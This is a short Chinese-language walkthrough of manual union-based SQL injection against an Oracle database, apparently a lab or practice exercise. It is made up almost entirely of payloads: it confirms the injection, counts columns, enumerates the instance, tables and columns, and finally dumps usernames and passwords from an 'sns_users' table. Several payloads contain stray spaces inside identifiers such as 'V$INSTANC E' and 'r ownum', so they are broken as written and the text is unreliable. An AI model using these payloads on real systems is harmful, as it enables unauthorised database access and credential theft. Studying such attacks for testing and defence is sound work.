1、判断注入点
输入 and 1=1,页面正常 and 1=2,页面出错,存在sql注入
2、判断列数
输入order by 2,页面正常,order by 3,页面出错,所以只有两列
3、:获取显错点
union select 'null','null' from dual (dual 为 伪表)
4、:查询当前数据库库名
-1 union select 'null',(select instance_name from V$INSTANC E) from dual
5、查询数据库表名
第一个表名
-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
第二个表名
-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
第三个表名
-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_nam e not in 'LOGMNR_GLOBAL$') from dual
模糊查询带user的表名
-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
6、:查询数据库列名
模糊搜索
-1 union select 'null',(select column_name from user_tab_co lumns where table_name='sns_users' and rownum=1 and column_name like '%USE R%') from dual
-1 union select 'null',(select column_name from user_tab_co lumns where table_name='sns_users' and rownum=1 and column_name like '%USE R%' and column_name <> 'USER_NAME') from dual
7、查询数据库数据获取账号密码的字段内容
-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1
-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1 and USER_NAME <> 'zhong'
-1 union select USER_NAME,USER_PWD from "sns_users" where r ownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'